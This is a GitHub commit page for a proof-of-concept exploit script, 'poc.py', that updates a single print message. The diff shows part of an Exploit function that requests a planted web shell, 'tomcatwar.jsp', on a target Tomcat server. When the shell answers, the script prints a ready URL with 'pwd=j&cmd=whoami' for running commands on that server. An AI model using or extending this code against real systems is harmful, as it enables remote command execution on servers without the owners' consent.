Skip to content

Commit 07463b3

Browse files
Update poc.py
1 parent efbf437 commit 07463b3

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

poc.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@ def Exploit(url):
1919
shellurl = urljoin(url, 'tomcatwar.jsp')
2020
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
2121
if shellgo.status_code == 200:
22-
print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
22+
print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=whoami")
2323
except Exception as e:
2424
print(e)
2525
pass

0 commit comments

Comments
 (0)